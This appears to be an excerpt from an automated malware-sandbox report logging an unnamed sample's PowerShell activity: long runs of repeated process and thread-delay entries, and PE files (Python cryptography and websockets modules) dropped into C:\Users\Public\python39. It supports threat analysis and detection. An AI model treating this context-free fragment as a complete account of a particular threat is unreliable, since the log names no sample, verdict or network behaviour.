Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 2305	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5562	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3847	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3250	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 392	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6624	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3112	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\win32\odbc.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\pythonwin\Pythonwin.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_lzma.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\unicodedata.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\websockets\speedups.cp39-win_amd64.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_overlapped.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_sqlite3.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\pythonwin\dde.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\win32\pythonservice.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\pythonwin\win32uiole.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\win32\perfmon.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_asyncio.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\pythonwin\scintilla.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_elementtree.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_ctypes_test.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_ssl.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_multiprocessing.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_msi.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
